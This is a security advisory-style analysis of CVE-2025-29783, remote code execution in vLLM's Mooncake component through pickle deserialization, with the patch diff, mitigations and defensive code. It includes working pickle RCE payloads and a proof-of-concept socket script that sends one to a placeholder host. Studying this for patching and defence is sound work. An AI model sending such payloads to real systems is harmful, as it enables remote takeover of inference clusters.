CVE-2025-29783: Remote Code Execution in vLLM via Unsafe Deserialization in Mooncake
Executive Summary
CVE-2025-29783 is a critical remote code execution (RCE) vulnerability affecting vLLM, a high-throughput and memory-efficient inference and serving engine for Large Language Models (LLMs). The vulnerability stems from unsafe deserialization with `pickle` in the Mooncake component, which is used for distributed key-value (KV) cache management. When vLLM is configured to use Mooncake, unauthenticated attackers can execute arbitrary code on distributed hosts. They do this by sending malicious serialized data to the ZMQ/TCP sockets that Mooncake exposes on all network interfaces. The fix replaces `pickle` with `safetensors` for serialization, which removes this code-execution path. This vulnerability has a CVSS v3.1 base score of 10.0, indicating its critical severity.
Technical Details
The vulnerability resides in the `vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py` module of the vLLM project. This module transfers KV caches between distributed nodes using ZeroMQ (ZMQ) over TCP. Versions prior to 0.8.0 are affected. The core issue is that the module uses Python's `pickle` module to serialize and deserialize tensor data during the transfer.
The vulnerable code is located in the `_send_impl` and `_recv_impl` methods of the `MooncakeKVPipe` class. These methods send and receive tensor data, respectively:
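```python
import pickle

import torch


class MooncakeKVPipe:  # excerpt: only the two affected methods are shown
    def _send_impl(self, tensor: torch.Tensor) -> None:
        """Implement the tensor sending logic."""
        value_bytes = pickle.dumps(tensor)
        self.transfer_engine.send_bytes(value_bytes)

    def _recv_impl(self) -> torch.Tensor:
        """Implement the tensor receiving logic."""
        data = self.transfer_engine.recv_bytes()
        # Vulnerable: unpickles bytes received from the network as-is.
        return pickle.loads(data)
```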
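The `pickle.dumps()` function serializes the tensor into a byte stream, which is then sent over the network. On the receiving end, `pickle.loads()` deserializes the byte stream back into a tensor. The problem is that `pickle` is inherently unsafe when handling untrusted data. A pickle stream is a sequence of instructions for the unpickler, and those instructions can import any callable available to the receiving process (such as `os.system`) and call it with attacker-chosen arguments. Deserializing an attacker-controlled stream therefore amounts to running attacker-chosen code.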
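The dangerous part is the opcode stream itself, so it can be inspected without unpickling anything. The sketch below uses the standard library's `pickletools.genops`, which decodes opcodes without executing them, to list the `(module, name)` callables a stream asks the unpickler to import. The helper name `referenced_callables` is hypothetical. Its handling of `STACK_GLOBAL` is a heuristic, so treat it as an inspection aid and not as a safe way to accept untrusted pickles.

```python
import pickletools

# Opcodes that push a str onto the unpickler's stack.
_STRING_OPS = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


def referenced_callables(data: bytes) -> list[tuple[str, str]]:
    """List (module, name) pairs that a pickle stream would import.

    Only decodes opcodes via pickletools.genops; nothing is executed.
    Heuristic: for STACK_GLOBAL (protocol 4+), the module and name are
    assumed to be the two most recently pushed strings. This holds for
    plain pickle.dumps() output but not for every hand-crafted stream.
    """
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # Protocols 0-3 encode the target as "module name".
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.append((recent_strings[-2], recent_strings[-1]))
        elif opcode.name in _STRING_OPS:
            recent_strings.append(arg)
    return found
```

Consider a payload whose `__reduce__` returns `os.system`. On Linux, the helper reports `("posix", "system")` for it, and `("nt", "system")` on Windows. A pickled list of integers yields an empty list.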
Affected systems are those running vLLM with Mooncake enabled for distributed KV cache management. This typically involves a cluster of machines communicating over a network using ZMQ/TCP. The Mooncake sockets listen on all network interfaces, so any host that can reach the Mooncake port can potentially exploit the vulnerability. That includes hosts outside the cluster network if the port is exposed.
Root Cause Analysis
The root cause of CVE-2025-29783 is the use of Python's `pickle` module to serialize and deserialize data in a network-exposed service. `pickle` is known to enable arbitrary code execution. During deserialization it can instantiate arbitrary Python objects and call arbitrary functions, including ones that execute system commands or perform other malicious actions.
The `MooncakeKVPipe` class in `vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py` uses `pickle` to serialize PyTorch tensors before sending them over the network and to deserialize them upon receipt. As a result, an attacker who can send data to the ZMQ/TCP port used by Mooncake can inject malicious `pickle` payloads. The receiving vLLM instance then executes those payloads.
Here's a breakdown of how the vulnerability can be exploited:
- Attacker crafts a malicious pickle payload: The attacker creates a `pickle` stream that executes arbitrary Python code when deserialized. A common technique is to define a `__reduce__` method that specifies a function to be called during deserialization.
- Attacker sends the malicious payload to the vLLM instance: The attacker sends the crafted `pickle` stream to the ZMQ/TCP port used by the Mooncake component of vLLM.
- vLLM instance deserializes the payload: The receiving vLLM instance calls `pickle.loads()` on the received data, which deserializes the malicious payload and executes the embedded code.
- Arbitrary code execution: The attacker's code runs with the privileges of the vLLM process. This lets the attacker read sensitive data, modify files, or take complete control of the system.
The following is an example of a malicious `pickle` payload that executes the `uname -a` command:
```python
import os
import pickle


class RCE:
    def __reduce__(self):
        # os.system takes a single command string, not a tuple of words.
        cmd = ("uname -a",)
        return (os.system, cmd)


serialized_data = pickle.dumps(RCE())
# serialized_data can be sent to the vulnerable vLLM instance. When that
# instance deserializes it with pickle.loads(), os.system("uname -a") runs.
```
This payload defines a class `RCE` with a `__reduce__` method. `pickle` calls `__reduce__` when serializing an object to learn how to rebuild it. The method returns a callable and a tuple of arguments, and both are recorded in the stream. On deserialization, the unpickler calls that callable with those arguments. In this case, `__reduce__` tells `pickle` to call `os.system` to run `uname -a` when the object is deserialized.
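The same mechanism can be observed safely by replacing `os.system` with a harmless callable. In this sketch, `CallOnLoad` is a made-up class whose `__reduce__` names `operator.mul`. As a result, `pickle.loads()` returns whatever that call produces rather than a `CallOnLoad` instance.

```python
import operator
import pickle


class CallOnLoad:
    """Harmless stand-in for the RCE class above."""

    def __reduce__(self):
        # On pickle.loads(), the unpickler will call operator.mul(6, 7).
        return (operator.mul, (6, 7))


blob = pickle.dumps(CallOnLoad())
restored = pickle.loads(blob)
print(restored)  # 42: the callable's return value, not a CallOnLoad object
```

The stream, not the receiving code, decides which function runs. That is why the fix has to stop using `pickle` on network input rather than validate the result afterward.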
Patch Analysis
The fix for CVE-2025-29783 replaces `pickle` with `safetensors` for serializing and deserializing tensor data in the `MooncakeKVPipe` class. `safetensors` is a safer alternative to `pickle` because its format can only describe tensors (names, dtypes, shapes, and raw bytes). Loading it therefore cannot trigger arbitrary code execution.
The following diff shows the changes made to `vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py`:
```diff
--- a/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
+++ b/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
@@ -2,13 +2,14 @@
 
 import json
 import os
-import pickle
 from concurrent.futures import ThreadPoolExecutor
 from dataclasses import dataclass
 from typing import Optional, Union
 
 import torch
 import zmq
+from safetensors.torch import load as safetensors_load
+from safetensors.torch import save as safetensors_save
 
 from vllm.config import KVTransferConfig
 from vllm.distributed.kv_transfer.kv_pipe.base import KVPipeBase
@@ -237,14 +238,13 @@ def tensor_hash(self, tensor: torch.Tensor) -> int:
         return hash(tensor.data_ptr())
 
     def _send_impl(self, tensor: torch.Tensor) -> None:
-        """Implement the tensor sending logic."""
-        value_bytes = pickle.dumps(tensor)
-        self.transfer_engine.send_bytes(value_bytes)
+        """Implement the tensor sending logic using safetensors."""
+        self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
 
     def _recv_impl(self) -> torch.Tensor:
-        """Implement the tensor receiving logic."""
+        """Implement the tensor receiving logic using safetensors."""
         data = self.transfer_engine.recv_bytes()
-        return pickle.loads(data)
+        return safetensors_load(data)["tensor"].to(self.device)
 
     def send_tensor(self, tensor: Optional[torch.Tensor]) -> None:
         """Send tensor to the target process."""
```
The patch removes the `import pickle` statement and adds `from safetensors.torch import load as safetensors_load` and `from safetensors.torch import save as safetensors_save`. The `_send_impl` method now uses `safetensors_save` to serialize the tensor into a byte stream. The `_recv_impl` method uses `safetensors_load` to deserialize the byte stream back into a tensor. `safetensors_load` returns tensors on the CPU, so the `.to(self.device)` call moves the result onto the pipe's device.
Specifically, the following lines were changed:
- In `_send_impl`, `value_bytes = pickle.dumps(tensor)` and `self.transfer_engine.send_bytes(value_bytes)` are replaced with the single call `self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))`.
- In `_recv_impl`, `return pickle.loads(data)` is replaced with `return safetensors_load(data)["tensor"].to(self.device)`.
The `safetensors_save` function takes a dictionary whose keys are tensor names and whose values are the tensors themselves. Here, the single tensor is named `"tensor"`. The `safetensors_load` function returns a dictionary of the deserialized tensors, and `["tensor"]` retrieves the tensor stored under that name.
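This change eliminates the possibility of arbitrary code execution through this channel. A `safetensors` buffer consists of an 8-byte length prefix, a JSON header describing each tensor's dtype, shape, and byte offsets, and the raw tensor bytes. Loading it only parses that header and copies bytes. It never imports modules or calls Python functions named by the data.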
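The following hand-rolled sketch of that layout, for a single float32 tensor using only the standard library, shows why parsing the format is inert. It is not the `safetensors` library. The function names are hypothetical, and the sketch skips most of the validation a real parser performs.

```python
import json
import struct


def build_f32_buffer(name: str, values: list[float], shape: list[int]) -> bytes:
    """Hand-roll a safetensors-style buffer holding one float32 tensor."""
    data = struct.pack(f"<{len(values)}f", *values)  # little-endian float32
    header = {name: {"dtype": "F32", "shape": shape, "data_offsets": [0, len(data)]}}
    header_bytes = json.dumps(header).encode("utf-8")
    # Layout: 8-byte little-endian header length, JSON header, raw tensor bytes.
    return struct.pack("<Q", len(header_bytes)) + header_bytes + data


def read_f32_tensor(blob: bytes, name: str) -> tuple[list[int], list[float]]:
    """Parse the buffer using only integer unpacking and json.loads."""
    if len(blob) < 8:
        raise ValueError("buffer too short for a header length")
    (header_len,) = struct.unpack("<Q", blob[:8])
    if header_len > len(blob) - 8:
        raise ValueError("declared header length exceeds buffer size")
    header = json.loads(blob[8 : 8 + header_len].decode("utf-8"))
    if not isinstance(header, dict) or name not in header:
        raise ValueError(f"no tensor named {name!r} in header")
    entry = header[name]
    if entry.get("dtype") != "F32":
        raise ValueError("this sketch only handles F32 tensors")
    begin, end = entry["data_offsets"]
    start = 8 + header_len  # data offsets are relative to the end of the header
    raw = blob[start + begin : start + end]
    values = list(struct.unpack(f"<{len(raw) // 4}f", raw))
    return entry["shape"], values
```

Nothing in the parser can turn attacker bytes into a function call. For ordinary pickle output, the leading bytes decode to a header length far larger than the buffer, so `read_f32_tensor` rejects it with `ValueError`.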
Exploitation Techniques
Because the vulnerability is an unsafe deserialization issue, an attacker can craft a malicious `pickle` payload that executes arbitrary code when the vulnerable vLLM instance deserializes it.
Here's a conceptual proof-of-concept (PoC) illustrating how an attacker could exploit this vulnerability. The PoC is hypothetical and only demonstrates the general principle of exploiting `pickle` deserialization. A real exploit would need to be adapted to the specific environment and transport of the target vLLM instance.
```python
import os
import pickle
import socket

# Target information (placeholders)
TARGET_HOST = "vulnerable_vllm_host"
TARGET_PORT = 12345  # Replace with the actual Mooncake port


# Malicious payload
class RCE:
    def __reduce__(self):
        # os.system takes a single command string; this creates /tmp/pwned
        return (os.system, ("touch /tmp/pwned",))


payload = pickle.dumps(RCE())

# Create a socket and connect to the target.
# NOTE: this writes raw bytes over plain TCP. A ZMQ peer expects the ZMTP
# handshake and message framing, so this illustrates the idea only.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((TARGET_HOST, TARGET_PORT))
    print(f"Connected to {TARGET_HOST}:{TARGET_PORT}")
    # Send the malicious payload
    sock.sendall(payload)
    print("Malicious payload sent.")
except OSError as e:
    print(f"Socket error: {e}")
finally:
    sock.close()
    print("Connection closed.")
```
Explanation:
- Target Information: Set the `TARGET_HOST` and `TARGET_PORT` variables to the IP address and port number of the vulnerable vLLM instance's Mooncake component.
- Malicious Payload: The `RCE` class defines a `__reduce__` method that executes the `touch /tmp/pwned` command on the target system when the object is deserialized. Creating the file `/tmp/pwned` is a simple way to verify that code execution succeeded.
- Socket Connection: The code creates a socket and connects to the target host and port.
- Payload Transmission: The code sends the malicious `pickle` payload to the target system.
- Error Handling: The code includes basic error handling to catch socket errors.
Attack Scenario:
- The attacker identifies a vLLM instance running with Mooncake enabled.
- The attacker determines the ZMQ/TCP port used by Mooncake (e.g., by examining the vLLM configuration).
- The attacker crafts a malicious `pickle` payload as shown above.
- The attacker executes the PoC script, sending the malicious payload to the vLLM instance.
- If the exploit is successful, the `touch /tmp/pwned` command runs on the vLLM instance and creates the `/tmp/pwned` file.
Real-World Impacts:
The impact of this vulnerability is severe. An attacker who successfully exploits this vulnerability can gain complete control of the vLLM instance and potentially the entire cluster of machines running vLLM. This could lead to:
- Data Breach: The attacker could steal sensitive data processed by the LLMs.
- System Compromise: The attacker could install malware, create backdoors, or use the compromised systems to launch attacks against other targets.
- Denial of Service: The attacker could crash the vLLM instance or disrupt its operation.
- Reputation Damage: A successful attack could damage the reputation of the organization using vLLM.
Mitigation Strategies
To mitigate the risk of CVE-2025-29783, the following steps should be taken:
- Upgrade to vLLM 0.8.0 or later: This version contains the fix for the vulnerability, which replaces `pickle` with `safetensors` for serialization.
- Disable Mooncake if not needed: If distributed KV cache management is not required, disable Mooncake. The vulnerable code path is only reachable when vLLM is configured to use Mooncake.
- Network Segmentation: Isolate the vLLM cluster from the rest of the network to limit the potential impact of a successful attack. Use firewalls to restrict access to the ZMQ/TCP port used by Mooncake to trusted cluster nodes.
- Authentication and Authorization: Implement authentication and authorization mechanisms to control who can send data to the Mooncake component. This reduces exposure, but the vulnerable endpoint itself performs no authentication, so upgrading to the patched version is still essential.
- Monitoring and Intrusion Detection: Implement monitoring and intrusion detection systems to detect suspicious activity on the vLLM cluster. This can help identify and respond to attacks in a timely manner.
- Security Best Practices: Follow general security best practices, such as keeping software up to date, using strong passwords, and educating users about phishing and other social engineering attacks.
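For the upgrade step, the minimal sketch below checks whether the installed vLLM is at or above 0.8.0. It assumes vLLM is installed under the distribution name `vllm`. `is_patched` and `installed_vllm_version` are hypothetical helpers. The hand-written version parsing is deliberately simple; the `packaging` library's `Version` class is the more complete option.

```python
import re
from importlib.metadata import PackageNotFoundError, version
from typing import Optional

FIXED_RELEASE = (0, 8, 0)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(.*)$")


def is_patched(version_str: str) -> bool:
    """Return True if a vLLM version string is at or above 0.8.0.

    Conservative: pre-release/dev builds of 0.8.0 itself (e.g. "0.8.0rc1")
    count as unpatched, and unparseable strings count as unpatched.
    Local build tags such as "+cu118" are ignored.
    """
    public = version_str.split("+", 1)[0]
    match = _VERSION_RE.match(public)
    if match is None:
        return False
    major, minor, micro, rest = match.groups()
    release = (int(major), int(minor), int(micro or 0))
    if release != FIXED_RELEASE:
        return release > FIXED_RELEASE
    # Exactly 0.8.0: only accept final (or post) releases.
    return re.search(r"(?:a|b|rc|dev)", rest) is None


def installed_vllm_version() -> Optional[str]:
    """Return the installed vLLM version, or None if it is not installed."""
    try:
        return version("vllm")
    except PackageNotFoundError:
        return None
```

For example, `is_patched("0.7.3")` is `False` and `is_patched("0.8.1+cu118")` is `True`.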
Timeline of Discovery and Disclosure
- 2025-03-04: Initial commit addressing the vulnerability.
- 2025-03-19: CVE-2025-29783 assigned and publicly disclosed.
- 2025-03-19: vLLM version 0.8.0 released with the fix.
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29783
- GitHub Advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7
- Commit fixing the vulnerability: https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2
- Pull Request fixing the vulnerability: https://github.com/vllm-project/vllm/pull/14228